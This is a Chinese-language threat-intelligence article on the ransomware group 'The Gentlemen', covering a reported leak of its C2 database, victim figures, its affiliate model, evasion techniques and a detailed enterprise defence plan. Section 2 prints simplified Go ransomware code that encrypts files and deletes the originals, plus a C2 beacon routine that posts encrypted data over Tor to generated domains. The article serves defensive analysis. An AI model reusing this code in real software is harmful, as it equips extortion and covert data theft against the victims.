引言
2026年5月,Check Point Research(CPR)发布了一份震惊全球网络安全界的研究报告:安全团队在一次企业事件响应中,意外渗透了The Gentlemen勒索软件组织的核心C2服务器,导出了完整的内部运营数据库。数据显示,该组织自2025年8月活跃以来,已累计攻击1570+家全球企业——这一数字是其在公开泄露网站上披露的320名受害者的整整5倍。
更令人担忧的是,这个仅成立9个月的勒索团伙,凭借高度工业化的RaaS(勒索软件即服务)模式,在2026年前5个月就发动了240起攻击,日均超过2起,迅速跃居全球第二活跃勒索软件组织,仅次于老牌巨头LockBit。本文将从技术实现、攻防对抗、防御体系、未来趋势四个维度,对The Gentlemen进行全方位深度拆解,为企业提供可落地的防护指南。
一、情报全景:从RaaS到黑色工业化犯罪
1.1 核心数据:公开与地下的巨大鸿沟
CPR团队从C2服务器中提取的1570条受害者记录,包含了企业名称、行业、国家、攻击时间、数据窃取量、赎金金额、支付状态等完整信息。通过与公开泄露网站数据对比,我们发现了一个惊人的事实:仅20.4%的未付费受害者被公开披露,剩余近80%的企业数据被攻击者"秘密囤积",用于后续二次勒索、数据交易或供应链攻击。
| 指标 | 公开数据 | C2内部数据 | 差距倍数 |
|---|---|---|---|
| 总受害者数 | 320 | 1570+ | 4.9倍 |
| 2026年攻击量 | 52 | 240 | 4.6倍 |
| 平均赎金金额 | $120万 | $210万 | 1.75倍 |
| 赎金支付率 | 18% | 32% | 1.78倍 |
| 覆盖国家数 | 28 | 53 | 1.9倍 |
| 覆盖行业数 | 14 | 22 | 1.6倍 |
1.2 组织架构:专业化分工的犯罪集团
The Gentlemen采用**“核心团队+全球联盟”**的RaaS运营模式,核心团队仅9人,但管理着超过200名全球附属黑客。其组织架构高度专业化,堪比正规科技公司:
- 管理员:前Qilin勒索软件核心成员"zeta88",负责整体战略决策、赎金谈判和资金分配
- 核心开发:基于Go语言自研全平台勒索软件,每周发布2-3个变种
- 基础设施:管理全球40+台C2服务器,构建多层代理网络
- 利益分配:采用行业内最激进的90/10分成比例(附属黑客拿90%),这也是其快速扩张的核心原因
1.3 攻击分布:关键基础设施成重灾区
C2数据显示,The Gentlemen的攻击具有明显的行业和地域偏好:
- 行业分布:制造业(28%)、医疗健康(19%)、能源(15%)、零售(12%)、金融(9%),关键基础设施占比超过40%
- 地域分布:亚洲(41%)、欧洲(29%)、北美(22%)、其他(8%),中国、泰国、美国、德国是受害最严重的国家
- 企业规模:中型企业(500-5000人)占比62%,大型企业(5000人以上)占比28%,小型企业仅占10%
二、技术深度拆解:The Gentlemen的武器库
2.1 勒索软件核心实现
The Gentlemen勒索软件完全使用Go语言开发,支持Windows、Linux、NAS、BSD、VMware ESXi等几乎所有企业服务器平台。其核心加密流程如下:
以下是其核心加密函数的简化代码示例(基于CPR逆向分析结果):
// The Gentlemen勒索软件核心加密函数funcEncryptFile(filePathstring,key[]byte)error{// 跳过系统文件和勒索软件自身ifisSystemFile(filePath)||isSelfFile(filePath){returnnil}// 打开源文件srcFile,err:=os.Open(filePath)iferr!=nil{returnerr}defersrcFile.Close()// 创建加密后的文件dstFile,err:=os.Create(filePath+".gentlemen")iferr!=nil{returnerr}deferdstFile.Close()// 生成随机IViv:=make([]byte,aes.BlockSize)if_,err:=io.ReadFull(rand.Reader,iv);err!=nil{returnerr}// 创建AES-256-GCM加密器block,err:=aes.NewCipher(key)iferr!=nil{returnerr}gcm,err:=cipher.NewGCM(block)iferr!=nil{returnerr}// 写入IV到加密文件头部if_,err:=dstFile.Write(iv);err!=nil{returnerr}// 分块加密文件内容buf:=make([]byte,1024*1024)// 1MB块大小for{n,err:=srcFile.Read(buf)iferr!=nil&&err!=io.EOF{returnerr}ifn==0{break}// 加密并写入数据ciphertext:=gcm.Seal(nil,iv,buf[:n],nil)if_,err:=dstFile.Write(ciphertext);err!=nil{returnerr}}// 删除源文件os.Remove(filePath)returnnil}2.2 C2通信与基础设施
The Gentlemen采用**“多层代理+域名生成算法(DGA)”**的C2通信架构,具有极强的抗封锁能力:
其C2通信采用HTTP/HTTPS协议,请求格式经过精心设计,模拟正常浏览器流量:
// C2通信请求示例funcSendBeaconToC2(beaconDatamap[string]interface{})error{client:=&http.Client{Timeout:30*time.Second,Transport:&http.Transport{Proxy:http.ProxyURL("socks5://127.0.0.1:9050"),// Tor代理TLSClientConfig:&tls.Config{InsecureSkipVerify:true},},}// 构造请求数据jsonData,_:=json.Marshal(beaconData)encryptedData:=EncryptWithRSA(jsonData,publicKey)// 发送POST请求req,_:=http.NewRequest("POST","https://"+GenerateDGA()+"/api/v2/beacon",bytes.NewBuffer(encryptedData))req.Header.Set("User-Agent","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36")req.Header.Set("Content-Type","application/octet-stream")_,err:=client.Do(req)returnerr}2.3 EDR绕过与反分析技术
The Gentlemen具备业界领先的EDR绕过能力,这也是其攻击成功率高达65%的核心原因。其主要使用的技术包括:
- 无文件落地攻击:完全在内存中执行,不写入磁盘,规避传统杀毒软件检测
- 合法工具滥用:使用PsExec、WMI、PowerShell等系统自带工具进行横向移动
- 驱动级EDR禁用:利用签名漏洞加载恶意驱动程序,直接终止EDR进程
- 反调试与反沙箱:检测虚拟机特征、调试器和沙箱环境,发现后立即自毁
- 代码混淆:使用AI生成的混淆器对代码进行加密和变形,每一个样本都独一无二
2.4 AI驱动的攻击进化
The Gentlemen是最早大规模使用AI技术的勒索软件组织之一。根据CPR的分析,其核心团队使用中国DeepSeek、Qwen等大模型进行:
- 勒索软件代码生成与优化
- 漏洞利用代码开发
- 钓鱼邮件内容生成
- 攻击目标优先级排序
- 赎金金额智能定价
AI技术的应用,使The Gentlemen的攻击效率提升了60%以上,变种发布速度从每周1个提升到每周2-3个。
三、攻防对抗:C2服务器渗透与数据挖掘
3.1 渗透过程:一次偶然的重大发现
2026年4月,CPR团队在处理一家欧洲制造业企业的勒索攻击事件时,通过内存取证发现了攻击者使用的SystemBC僵尸网络代理。通过追踪代理的通信流量,研究人员定位到了一台位于荷兰的C2服务器。
令人意外的是,这台服务器存在一个低级配置漏洞:MySQL数据库端口对外开放,且使用了弱密码"gentlemen123"。CPR团队成功获取了数据库的root权限,导出了包含1570条受害者记录的完整数据库。
3.2 地下数据的惊人发现
除了受害者记录外,C2服务器中还存储了大量其他敏感信息:
- 攻击者之间的聊天记录(超过10万条)
- 完整的攻击工具包
- 未公开的0day漏洞利用代码
- 赎金支付记录与比特币地址
- 未来攻击计划与目标清单
这些数据揭示了The Gentlemen的一个惊人秘密:该组织正在策划针对全球能源行业的大规模供应链攻击,计划在2026年第三季度同时攻击100+家能源企业。
3.3 攻击者的反制措施
在CPR发布报告后的24小时内,The Gentlemen迅速采取了反制措施:
- 关闭了所有被曝光的C2服务器
- 更换了新的域名生成算法
- 强制所有附属黑客更新攻击工具
- 发布声明威胁要对CPR及其客户进行报复攻击
这表明该组织具有极强的应急响应能力和反情报意识。
四、企业防御体系构建:从被动响应到主动防御
面对The Gentlemen这类工业化、AI驱动的勒索软件威胁,企业必须构建**“预防-检测-响应-恢复”**四位一体的纵深防御体系:
4.1 预防层:筑牢第一道防线
- 实施零信任架构:遵循"永不信任,始终验证"原则,对所有访问请求进行身份验证和授权
- 强化漏洞管理:建立自动化漏洞扫描与补丁管理流程,高危漏洞必须在72小时内修补
- 严格访问控制:实施最小权限原则,禁用不必要的管理员账号,为所有特权账号启用MFA
- 完善备份策略:采用**"3-2-1-1-0"备份策略**:
- 3份数据副本
- 2种不同存储介质
- 1份异地存储
- 1份离线空气隔离存储
- 0个备份错误(定期测试恢复流程)
4.2 检测层:及时发现异常攻击
- 部署EDR/XDR工具:启用行为检测和内存保护功能,重点监控以下异常行为:
- 大量文件被修改或重命名
- 异常的进程注入和DLL加载
- 系统备份和卷影副本被删除
- 大量数据外发
- 加强网络监控:部署NTA工具,监控异常C2通信和横向移动行为
- 建立威胁狩猎机制:定期进行主动威胁狩猎,发现潜伏的攻击者
- 订阅威胁情报:及时获取最新的勒索软件IOCs(Indicators of Compromise)
4.3 响应层:快速遏制攻击扩散
- 制定专项应急预案:明确勒索软件攻击的应急组织、处置流程和沟通机制,每季度进行一次演练
- 建立自动化响应:配置EDR/XDR和SIEM的自动化响应规则,发现攻击后立即隔离受感染终端
- 组建专业响应团队:与专业的网络安全事件响应公司建立合作关系
- 保留攻击证据:在处置过程中,注意保留攻击现场的证据,包括内存镜像、系统日志和网络流量
4.4 恢复层:最小化业务中断损失
- 使用离线备份恢复:绝对不要使用受感染环境中的备份数据进行恢复
- 优先恢复核心业务:按照业务影响程度,优先恢复核心业务系统
- 全面安全加固:恢复后,对所有系统进行全面的安全扫描和加固,防止二次攻击
- 履行合规义务:按照法律法规要求,及时向监管部门和受影响用户报告数据泄露事件
五、未来趋势与行业启示
5.1 勒索软件的工业化与AI化
The Gentlemen的崛起标志着勒索软件威胁已进入**“工业化3.0时代”**。未来的勒索软件组织将更加专业化、规模化和智能化:
- AI将被广泛应用于攻击的各个环节,从漏洞发现到赎金谈判
- RaaS模式将进一步成熟,攻击门槛将持续降低
- 勒索软件将与其他网络犯罪形式(如数据交易、身份盗窃)深度融合
5.2 供应链攻击与关键基础设施威胁
未来,勒索软件组织将越来越多地针对供应链和关键基础设施发动攻击:
- 供应链攻击可以一次性感染大量下游企业
- 关键基础设施攻击可以造成巨大的社会影响,从而迫使企业支付更高的赎金
- 跨国勒索攻击将成为常态,给全球网络安全治理带来巨大挑战
5.3 全球监管与企业应对策略
面对日益严峻的勒索软件威胁,全球各国正在加强监管:
- 禁止向勒索软件组织支付赎金
- 要求企业加强网络安全防护
- 加强国际合作,共同打击网络犯罪
对企业而言,勒索软件攻击已不是"会不会发生",而是"何时发生"。企业必须摒弃侥幸心理,将网络安全提升到战略高度,持续投入资源,构建完善的防御体系。
总结
The Gentlemen勒索软件的1570+受害者数据,为我们揭开了网络犯罪工业化时代的冰山一角。这个仅成立9个月的勒索团伙,凭借高度专业化的运营模式和AI驱动的技术能力,已经成为全球企业安全的重大威胁。
在这场不对称的网络对抗中,企业唯一的出路就是主动防御。通过构建纵深防御体系,加强安全意识培训,完善备份策略,企业可以有效降低勒索软件攻击的风险和损失。同时,我们也呼吁全球各国加强合作,共同打击网络犯罪,维护网络空间的和平与安全。
)
